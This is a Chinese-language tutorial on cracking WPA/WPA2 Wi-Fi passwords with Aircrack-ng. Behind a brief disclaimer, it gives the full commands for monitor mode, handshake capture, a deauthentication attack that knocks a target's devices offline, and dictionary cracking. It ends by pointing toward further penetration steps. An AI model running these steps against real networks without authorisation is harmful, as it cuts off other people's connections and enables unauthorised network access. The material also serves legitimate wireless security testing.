注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!
一、Aircrack-ng简介
Aircrack-ng Aircrack-ng 是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。 Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并 嗅探 802.11a , 802.11b , 802.11g 的数据。
二、WIFI破解配置要求
一、自建WIFI进行测试
二、外置网卡设置
三、信号稳定
三、WIFI破解的流程
1.查看网卡设备
命令:ifconfig / iwconfig
2.查看是否支持监听模式
命令:airmon-ng
3.开启无线网卡监听模式
命令:airmon-ng start wlan0
可以ifconfig再次查看信息
4.查看周围WIFI网络
命令:airodump-ng wlan0mon
5.监听目标网络的手包
命令:airodump-ng -c 自己选择CH --bssid mac -w 路径 wlan0mon
参数解释:
-c 指定频道号
-bssid 指定路由器bssid
-w 指定抓取的数据包保存位置
6.强制对方WIFI断开重连(获取握手包)
命令:aireplay-ng -0 50 -a 路由mac地址 -c 主机 wlan0mon
参数解释:
-0 表示发起鉴权
deauthentication攻击
-a 指定无线路由器BSSID
-c 指定强制断开的设备
出现【WPA handshake: 】则可以停止攻击,不然别人一直处于断网状态
7.破解握手包密码
命令:aircrack-ng -a2 -b BSSID -w pass.txt ~/01/*.cap
参数解释:
-a2 表示WPA的握手包
-b 指定要破解的wifi BBSID
-w 指定字典文件
最后是抓取的包
8.关闭监听模式
命令:airmon-ng stop wlan0mon
四、扩展思路如何继续渗透测试
信息搜集、漏洞扫描、漏洞利用、获取权限、权限维持、整理思路